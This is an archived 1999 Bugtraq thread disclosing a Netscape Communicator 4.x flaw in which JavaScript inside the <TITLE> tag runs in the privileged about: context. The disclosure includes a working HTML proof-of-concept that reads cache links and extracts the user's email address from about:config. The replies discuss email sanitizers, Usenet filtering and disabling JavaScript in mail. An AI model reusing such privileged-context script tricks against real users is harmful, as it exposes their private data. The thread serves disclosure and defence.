Date: Mon, 24 May 1999 14:24:13 +0300
From: Georgi Guninski <joro@NAT.BG>
To: BUGTRAQ@netspace.org
Subject: Netscape Communicator JavaScript in <TITLE> security vulnerability
There is a security bug in Netscape Communicator 4.6 Win95, 4.07 Linux
(guess all 4.x versions are affected) in the way they treat JavaScript
code in the title of the document.
One may embed JavaScript code in the <TITLE> tag. If the info about the
document is shown, then the JavaScript code is executed. The info about the
document may be infoked by a script using 'location="wysiwyg://1/about:document" '.
The problem is that the JavaScript code is executed in the security context
of the "about:" protocol. This allows accessing documents in the "about:"
protocol such as: "about:cache", "about:config", "about:global", etc.
Vulnerabilities:
* Reading user's cache and accessing information such as passwords,
credit card numbers.
* Reading info about the Netscape's configuration ("about:config").
This includes finding user's email address, mail servers, the encoded mail password
(it must me saved and may be decoded). This allows reading user's email.
The more dangerous part is that this vulnerability MAY BE EXPLOITED
USING HTML MAIL MESSAGE.
Workaround: Disable JavaScript
Demonstration is available at: http://www.nat.bg/~joro/titlecache.html
Georgi Guninski
http://www.nat.bg/~joro
http://www.whitehats.com/guninski
----------------------------------------------------------------------------------------
<http://www.nat.bg/~joro/titlecache.html>
<HTML>
<HEAD>
<TITLE>
<SCRIPT>
a=window.open('wysiwyg://1/about:cache');
s='Here are some links in your cache: \n';
for(i=0;i<7;i++)
s += a.document.links[i] + '\n';
a.close();
alert(s);
a=window.open('wysiwyg://1/about:config');
mag='mail.identity.useremail = ';
mend='general.title_tips';
res=mag;
charstoread=20;
alert('Will try to find your email. May take some time.');
function readit() {
for(i=0;i<charstoread;i++) {
t=res;
a.find(mend);
for(c=1;c<256;c++) {
t=res + String.fromCharCode(c);
if (a.find(t,true,true)) {
/* alert(c); */
res=t;
}
}
}
res=res.substring(mag.length);
a.close();
alert("Your email is :\n" + res);
}
setTimeout("readit()",3000);
</SCRIPT>
</TITLE>
</HEAD>
<body>
There is a security bug in Netscape Communicator 4.6 Win95, 4.07 Linux
(guess all 4.x versions are affected) in the way they treat JavaScript
code in the title of the document.
<p>One may embed JavaScript code in the TITLE tag. If the info about
the document
<br>is shown, then the JavaScript code is executed. The info about the
document may be infoked by a script using 'location="wysiwyg://1/about:document"
'.
<p>The problem is that the JavaScript code is executed in the security
context of the "about:" protocol. This allows accessing documents in the
"about:" protocol such as: "about:cache", "about:config", "about:global",
etc.
<p>Vulnerabilities:
<br> * Reading user's cache and accessing information such as passwords,
credit card numbers.
<br> * Reading info about the Netscape's configuration ("about:config").
This includes finding user's email address, mail servers, the encoded
mail password (it must me saved and may be decoded). This allows
reading user's email.
<br>
The more dangerous part is that this vulnerability MAY BE EXPLOITED USING HTML MAIL MESSAGE.
<br>
<p>Workaround: Disable JavaScript
<br>
<a href="index.html">Go to Georgi Guninski's home page</a>
<br>
<br>
<SCRIPT>
location="wysiwyg://1/about:document";
</SCRIPT>
</body>
</HTML>
----------------------------------------------------------------------------------------
Date: Mon, 24 May 1999 10:23:06 -0700
From: John D. Hardin <jhardin@WOLFENET.COM>
To: BUGTRAQ@netspace.org
Subject: Re: Netscape Communicator JavaScript in <TITLE> security vulnerability
On Mon, 24 May 1999, Georgi Guninski wrote:
> Vulnerabilities:
> * Reading user's cache and accessing information such as passwords,
> credit card numbers.
> * Reading info about the Netscape's configuration ("about:config").
> This includes finding user's email address, mail servers, the
> encoded mail password (it must me saved and may be decoded). This
> allows reading user's email.
>
> The more dangerous part is that this vulnerability MAY BE EXPLOITED
> USING HTML MAIL MESSAGE.
...unless you're sanitizing your email. Anybody using an HTML-enabled
mail client should at least be aware of the availability of this tool:
ftp://ftp.rubyriver.com/pub/jhardin/antispam/procmail-security.html
--
John Hardin KA7OHZ jhardin@wolfenet.com
pgpk -a finger://gonzo.wolfenet.com/jhardin PGP key ID: 0x41EA94F5
PGP key fingerprint: A3 0C 5B C2 EF 0D 2C E5 E9 BF C8 33 A7 A9 CE 76
-----------------------------------------------------------------------
In the Lion
the Mighty Lion
the Zebra sleeps tonight...
Dee de-ee-ee-ee-ee de de de we um umma way!
-----------------------------------------------------------------------
9 days until Crusade: the Babylon Project
----------------------------------------------------------------------------------------
Date: Tue, 25 May 1999 12:30:52 -0600
From: Brett Glass <brett@LARIAT.ORG>
To: BUGTRAQ@netspace.org
Subject: Re: Netscape Communicator JavaScript in <TITLE> security vulnerability
John's recipes are great tools; we recommend them. Only one problem:
Procmail does not work on NetNews. (If this exploit works in mail it
almost certainly works in news.... Scary thought.)
--Brett Glass
At 10:23 AM 5/24/99 -0700, John D. Hardin wrote:
>On Mon, 24 May 1999, Georgi Guninski wrote:
>
> > Vulnerabilities:
> > * Reading user's cache and accessing information such as passwords,
> > credit card numbers.
> > * Reading info about the Netscape's configuration ("about:config").
> > This includes finding user's email address, mail servers, the
> > encoded mail password (it must me saved and may be decoded). This
> > allows reading user's email.
> >
> > The more dangerous part is that this vulnerability MAY BE EXPLOITED
> > USING HTML MAIL MESSAGE.
>
>...unless you're sanitizing your email. Anybody using an HTML-enabled
>mail client should at least be aware of the availability of this tool:
>
> ftp://ftp.rubyriver.com/pub/jhardin/antispam/procmail-security.html
>
>--
> John Hardin KA7OHZ jhardin@wolfenet.com
> pgpk -a finger://gonzo.wolfenet.com/jhardin PGP key ID: 0x41EA94F5
> PGP key fingerprint: A3 0C 5B C2 EF 0D 2C E5 E9 BF C8 33 A7 A9 CE 76
>-----------------------------------------------------------------------
> In the Lion
> the Mighty Lion
> the Zebra sleeps tonight...
> Dee de-ee-ee-ee-ee de de de we um umma way!
>-----------------------------------------------------------------------
> 9 days until Crusade: the Babylon Project
----------------------------------------------------------------------------------------
Date: Tue, 25 May 1999 21:40:43 -0400
From: Forrest J. Cavalier III <mibsoft@mibsoftware.com>
To: BUGTRAQ@netspace.org
Subject: Re: Netscape Communicator JavaScript in <TITLE> security
> John's recipes are great tools; we recommend them. Only one problem:
> Procmail does not work on NetNews. (If this exploit works in mail it
> almost certainly works in news.... Scary thought.)
>
> --Brett Glass
>
I don't know if the exploit works with Usenet messages, but
decent Usenet servers have filtering capabilities.
INN had perl filtering hooks since at least 1995,
and had easily modified code to analyze and reject
messages based on headers since the beginning (1993.)
In Usenet, generally most sites do not modify
and sanitize messages, they just drop and reject them
with just a message to the log, nothing else. Since
propagating modified messages, for whatever reason, is
never acceptable, it becomes a problem to sanitize:
it would mean keeping additional special copies around.
A full Usenet feed is on the order of 1E6 messages
per day, and nearly all are binaries (UUEncoded) The John D.
Hardin code looks solid, but might bog down a server
if every Usenet message had to go through it.
Personally, I don't think HTML (or binaries) belong
on Usenet in the first place, so it's a simple policy
to just drop posts containing HTML or UUencoding. :-)
Seriously, the Hardin perl code will drop pretty easily
into INN, although I haven't tried it myself.
See README.perl_hook in the INN distribution and
modify the procmail selector lines to the appropriate
perl instead, and return a reject code instead of
mangling and rewriting.
Forrest J. Cavalier III, Mib Software, INN customization and
consulting 'Pay-as-you-go' commercial support for INN: Only $64/hour!
Searchable hypertext INN docs, FAQ, RFCs, etc: 650+ pages:
http://www.mibsoftware.com/innsup.htm
----------------------------------------------------------------------------------------
Date: Tue, 25 May 1999 22:32:25 -0400
From: Usman <akeju00@IONAPREP.ORG>
To: BUGTRAQ@netspace.org
Subject: Re: Netscape Communicator JavaScript in <TITLE> securityvulnerability
"John D. Hardin" wrote:
>
> On Mon, 24 May 1999, Georgi Guninski wrote:
>>snip!<<
> > The more dangerous part is that this vulnerability MAY BE EXPLOITED
> > USING HTML MAIL MESSAGE.
>
> ...unless you're sanitizing your email. Anybody using an HTML-enabled
> mail client should at least be aware of the availability of this tool:
>
> ftp://ftp.rubyriver.com/pub/jhardin/antispam/procmail-security.html
>
> --
> John Hardin KA7OHZ jhardin@wolfenet.com
Or, just to add the said workaround, if you're only worried about email,
Netscape 4.5+ users can just disable JavaScript for Mail and News without
disabling JavaScript altoghether. I know there's still the meta refresh factor
for HTML-enabled mail clients, though. It would be, IMHO, a good idea for
Netscape to add a little "Disable/Enable HTML for Mail Messages" checkbox, don't
you think?
-Usman Akeju
----------------------------------------------------------------------------------------
Date: Sat, 12 Jun 1999 22:58:26 -0700
From: John D. Hardin <jhardin@WOLFENET.COM>
To: BUGTRAQ@netspace.org
Subject: Re: Netscape Communicator JavaScript in <TITLE> security
On Thu, 27 May 1999, Aleph One wrote:
> That doesn't really cut it. You can embed JavaScript into things
> linke onClick, onLoad, etc. You need to kill all those as well.
Thanks for pointing that out. I've updated the sanitizer to defang the
event handlers explicitly, which saves blocking the <BODY> and <TITLE>
tags themselves, and also protects links.
The current release of the sanitizer is 1.84 and it is available at
ftp://ftp.rubyriver.com/pub/jhardin/antispam/procmail-security.html
--
John Hardin KA7OHZ jhardin@wolfenet.com
pgpk -a finger://gonzo.wolfenet.com/jhardin PGP key ID: 0x41EA94F5
PGP key fingerprint: A3 0C 5B C2 EF 0D 2C E5 E9 BF C8 33 A7 A9 CE 76
-----------------------------------------------------------------------
Efficiency can magnify good, but it magnifies evil just as well.
So, we should not be surprised to find that modern electronic
communication magnifies stupidity as *efficiently* as it magnifies
intelligence.
-- Robert A. Matern
-----------------------------------------------------------------------
89 days until 9/9/99